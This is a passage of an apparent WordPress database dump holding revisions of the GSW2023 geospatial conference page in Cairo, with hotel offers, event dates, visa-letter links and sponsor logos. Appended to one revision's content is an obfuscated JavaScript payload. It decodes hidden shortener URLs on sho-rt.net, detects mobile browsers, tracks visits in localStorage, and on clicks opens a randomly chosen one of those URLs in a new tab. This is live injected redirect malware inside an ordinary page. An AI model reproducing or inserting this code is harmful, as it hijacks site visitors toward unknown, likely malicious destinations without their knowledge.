src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 01:09:09','2023-07-10 01:09:09','',3066,'https://gsw2023.com/?p=4995',0,'revision','',0),
(4996,1,'2023-07-10 01:12:00','2023-07-10 01:12:00','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" 